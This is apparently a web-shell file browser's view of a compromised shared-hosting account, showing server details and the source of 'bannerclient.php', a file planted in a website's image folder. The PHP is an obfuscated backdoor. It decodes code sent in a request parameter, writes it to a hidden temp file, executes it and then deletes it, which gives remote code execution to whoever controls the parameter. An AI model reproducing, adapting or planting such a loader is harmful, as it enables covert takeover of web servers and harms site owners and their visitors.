HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/self/root/proc/self/root/home/vitanhod/virgomax.vitavit.com.pk/img/bannerclient.php
<?php

if(array_key_exists("m\x61r\x6B\x65r", $_REQUEST) && !is_null($_REQUEST["m\x61r\x6B\x65r"])){
	$ref = $_REQUEST["m\x61r\x6B\x65r"];
		$ref = explode  ("."  	,$ref		) 		;
	$comp	='';
            $salt	='abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	=strlen(	 $salt  );
            $__len	=count(	 $ref  );
    
            for(	 $y	=0; $y	<	$__len; $y++) { 	$v2	=$ref[$y];
                $chS	=ord(	 $salt[$y%	$sLen]  );
                $d	=(	 (	 int)$v2 - $chS -(	 $y%	10))	^ 	71;
                $comp .=		chr(	 $d  );
            }
	$item = array_filter(["/tmp", "/var/tmp", session_save_path(), "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), getenv("TEMP")]);
	for ($rec = 0, $mrk = count($item); $rec < $mrk; $rec++) {
    $entity = $item[$rec];
    		if (!!is_dir($entity) && !!is_writable($entity)) {
    $key = "$entity/.property_set";
    if (@file_put_contents($key, $comp) !== false) {
	include $key;
	unlink($key);
	die();
}
}
}
}